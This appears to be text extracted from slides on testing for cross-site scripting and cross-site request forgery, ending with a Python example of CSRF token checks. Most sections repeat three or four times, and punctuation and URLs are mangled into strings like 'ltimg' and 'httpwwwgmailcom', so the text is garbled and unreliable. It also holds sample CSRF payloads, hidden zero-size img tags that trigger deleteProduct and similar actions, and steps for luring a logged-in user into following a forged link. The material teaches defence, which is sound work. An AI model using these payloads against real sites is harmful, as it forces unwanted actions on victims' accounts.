bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to test for CSRF weakness in a web application
• Consider a URL u = http://www.example.com/action
• Build an HTML page which contains an HTTP request referencing URL u
• Make sure the user is logged into the application
• Induce him into following the link pointing to the URL to be tested
• Check if the web server is executing the request
Preventing CSRF attacks
• Including CSRF tokens for each user session
• Submission of double cookies (the double-submit cookie pattern)
• Logging out from sensitive applications when the work is done
• Not saving any login credentials in the browser
• Using secure browser extensions
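As an added example (not code from the slides), the first two preventions combined on the server side: a per-session token bound to the session id by an HMAC, checked with the double-submit pattern, with the browser's Sec-Fetch-Site header used as an extra signal. SERVER_SECRET, the cookie/form dictionaries and the header values are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

# Constructed demo secret; a real deployment loads it from configuration (assumption).
SERVER_SECRET = b"constructed-demo-secret-rotate-me"


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token: random nonce plus an HMAC over (session id, nonce).
    Set it as the csrftoken cookie and embed it in every state-changing form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_valid_for_session(token: str, session_id: str) -> bool:
    """Recompute the MAC for this session; constant-time compare avoids leaking timing."""
    nonce, _, mac = token.partition(".")
    if not nonce or not mac:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def check_state_changing_request(cookies: Dict[str, str], form: Dict[str, str],
                                 headers: Dict[str, str]) -> Tuple[bool, str]:
    """Decide whether a POST may proceed. Returns (allowed, reason)."""
    session_id = cookies.get("sessionid")
    if not session_id:
        return False, "no session"
    # Double submit: the token must arrive both as a cookie and in the form body.
    # A forged <img> or auto-submitted cross-site form gets the cookie sent for free,
    # but cannot read it, so it cannot copy the value into the body.
    cookie_token = cookies.get("csrftoken")
    form_token = form.get("csrf_token")
    if not cookie_token or not form_token:
        return False, "csrf token missing"
    if not hmac.compare_digest(cookie_token, form_token):
        return False, "csrf token mismatch"
    # Binding to the session stops an attacker from planting a cookie/form pair of his own.
    if not token_valid_for_session(form_token, session_id):
        return False, "csrf token not bound to this session"
    # Defence in depth: modern browsers label the origin relationship of each request.
    # Older browsers omit the header, so absence is treated as same-origin here.
    if headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return False, "cross-site request rejected"
    return True, "ok"
```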
Queries